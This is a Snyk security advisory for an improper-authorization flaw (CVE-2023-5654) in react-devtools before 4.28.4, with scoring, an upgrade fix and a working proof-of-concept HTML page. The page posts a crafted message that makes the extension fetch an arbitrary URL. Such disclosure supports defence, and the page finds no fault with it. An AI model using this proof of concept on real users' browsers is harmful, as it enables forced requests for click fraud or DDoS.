Improper Authorization Affecting react-devtools package, versions <4.28.4
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (16th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-REACTDEVTOOLS-6023998
- published 22 Oct 2023
- disclosed 19 Oct 2023
- credit Calum Hutton - Snyk Research Team
Introduced: 19 Oct 2023
CVE-2023-5654 Open this link in a new tabHow to fix?
Upgrade react-devtools to version 4.28.4 or higher.
Overview
react-devtools is an Use react-devtools outside of the browser
Affected versions of this package are vulnerable to Improper Authorization through the window.addEventListener('message', <listener>) function. By exploiting this vulnerability, an attacker can generate clicks and revenue or initiate a Distributed Denial of Service (DDoS) attack without the victims’ knowledge or consent by sending a message that triggers a fetch request to an arbitrary
PoC
<!DOCTYPE html>
<html>
<head>
<script src="https://unpkg.com/react@18/umd/react.development.js" crossorigin></script>
<script src="https://unpkg.com/react-dom@18/umd/react-dom.development.js" crossorigin></script>
<script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
</head>
<body>
<div id="mydiv"></div>
<script type="text/babel">
function Hello() {
return <h1>Hello World!</h1>;
}
const container = document.getElementById('mydiv');
const root = ReactDOM.createRoot(container);
root.render(<Hello />)
</script>
<script>
function sendBrowserMsg() {
let msg = {
source: 'react-devtools-extension',
payload: {
type: 'fetch-file-with-cache',
url: 'https://www.google.com'
}
}
console.log(`Sending msg from browser: ${JSON.stringify(msg)}`);
postMessage(msg, "*");
}
</script>
<form>
<button type="button" id="submit" onClick="sendBrowserMsg()">Go!</button>
</form>
</body>
</html>